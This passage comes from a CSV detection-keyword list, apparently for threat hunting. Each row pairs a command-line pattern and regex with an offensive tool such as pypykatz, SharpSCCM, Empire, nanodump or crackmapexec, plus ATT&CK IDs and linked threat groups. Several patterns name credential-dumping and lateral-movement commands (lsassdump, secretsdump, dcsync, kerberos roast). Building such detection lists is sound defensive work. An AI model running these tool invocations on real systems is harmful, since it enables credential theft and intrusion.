Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "* linux_stealth.py*",".{0,1000}\slinux_stealth\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* linWinPwn*",".{0,1000}\slinWinPwn.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* --list=hidden-options*",".{0,1000}\s\-\-list\=hidden\-options.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* -listen :* -socks * -cert * -agentpassword *",".{0,1000}\s\-listen\s\:.{0,1000}\s\-socks\s.{0,1000}\s\-cert\s.{0,1000}\s\-agentpassword\s.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","0","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "* -ListMetasploitPayloads*",".{0,1000}\s\-ListMetasploitPayloads.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "* --list-payloads*",".{0,1000}\s\-\-list\-payloads.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "* live dpapi blobfile *.blob*",".{0,1000}\slive\sdpapi\sblobfile\s.{0,1000}\.blob.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live dpapi cred *",".{0,1000}\slive\sdpapi\scred\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live dpapi keys -o *",".{0,1000}\slive\sdpapi\skeys\s\-o\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live dpapi securestring *",".{0,1000}\slive\sdpapi\ssecurestring\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live dpapi vcred *",".{0,1000}\slive\sdpapi\svcred\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live dpapi vpol *",".{0,1000}\slive\sdpapi\svpol\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live dpapi wifi*",".{0,1000}\slive\sdpapi\swifi.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live kerberos apreq *",".{0,1000}\slive\skerberos\sapreq\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live kerberos dump*",".{0,1000}\slive\skerberos\sdump.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live kerberos purge*",".{0,1000}\slive\skerberos\spurge.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live kerberos roast*",".{0,1000}\slive\skerberos\sroast.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live kerberos sessions*",".{0,1000}\slive\skerberos\ssessions.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live kerberos tgt*",".{0,1000}\slive\skerberos\stgt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live kerberos triage*",".{0,1000}\slive\skerberos\striage.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live lsa -o *",".{0,1000}\slive\slsa\s\-o\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live lsa -o *",".{0,1000}\slive\slsa\s\-o\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live process create -c regedit*",".{0,1000}\slive\sprocess\screate\s\-c\sregedit.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live smb client *",".{0,1000}\slive\ssmb\sclient\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live smb dcsync *",".{0,1000}\slive\ssmb\sdcsync\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live smb lsassdump *",".{0,1000}\slive\ssmb\slsassdump\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live smb regdump *",".{0,1000}\slive\ssmb\sregdump\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live smb secretsdump *",".{0,1000}\slive\ssmb\ssecretsdump\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live smbapi localgroup enum -t*",".{0,1000}\slive\ssmbapi\slocalgroup\senum\s\-t.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live smbapi session enum *",".{0,1000}\slive\ssmbapi\ssession\senum\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live smbapi share enum*",".{0,1000}\slive\ssmbapi\sshare\senum.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live users whoami*",".{0,1000}\slive\susers\swhoami.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* llmnr-resolve.nse*",".{0,1000}\sllmnr\-resolve\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -LLMNRTTL *",".{0,1000}\s\-LLMNRTTL\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -llmnrtypes AAAA*",".{0,1000}\s\-llmnrtypes\sAAAA.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "* lltd-discovery.nse*",".{0,1000}\slltd\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --llvm-obfuscator * ",".{0,1000}\s\-\-llvm\-obfuscator\s.{0,1000}\s","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","8","707","118","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "* LMHASH:NTHASH*",".{0,1000}\sLMHASH\:NTHASH.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* lnkbomb.py*",".{0,1000}\slnkbomb\.py.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "* -LNKPath * -EncScript *",".{0,1000}\s\-LNKPath\s.{0,1000}\s\-EncScript\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BackdoorLNK.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* load_extra_pots*",".{0,1000}\sload_extra_pots.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* --load-dll *ssp.dll*",".{0,1000}\s\-\-load\-dll\s.{0,1000}ssp\.dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*----- LOADLIBRARYA HOOK -----*",".{0,1000}\-\-\-\-\-\sLOADLIBRARYA\sHOOK\s\-\-\-\-\-.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "* --load-shellcode *",".{0,1000}\s\-\-load\-shellcode\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* local class-instances SMS_Authority*",".{0,1000}\slocal\sclass\-instances\sSMS_Authority.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* local class-properties SMS_Authority*",".{0,1000}\slocal\sclass\-properties\sSMS_Authority.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* local grep *ccmsetup started *ccmsetup.log*",".{0,1000}\slocal\sgrep\s.{0,1000}ccmsetup\sstarted\s.{0,1000}ccmsetup\.log.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* local query * FROM SMS_Authority*",".{0,1000}\slocal\squery\s.{0,1000}\sFROM\sSMS_Authority.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* local secrets -m disk*",".{0,1000}\slocal\ssecrets\s\-m\sdisk.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* local secrets -m wmi*",".{0,1000}\slocal\ssecrets\s\-m\swmi.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* local_execution_linux.exe*",".{0,1000}\slocal_execution_linux\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* local_map.exe*",".{0,1000}\slocal_map\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* local_thread_hijacking.exe*",".{0,1000}\slocal_thread_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* LocalAdminAccess.txt*",".{0,1000}\sLocalAdminAccess\.txt.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "* --local-auth --shares*",".{0,1000}\s\-\-local\-auth\s\-\-shares.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* localbrute.ps1*",".{0,1000}\slocalbrute\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 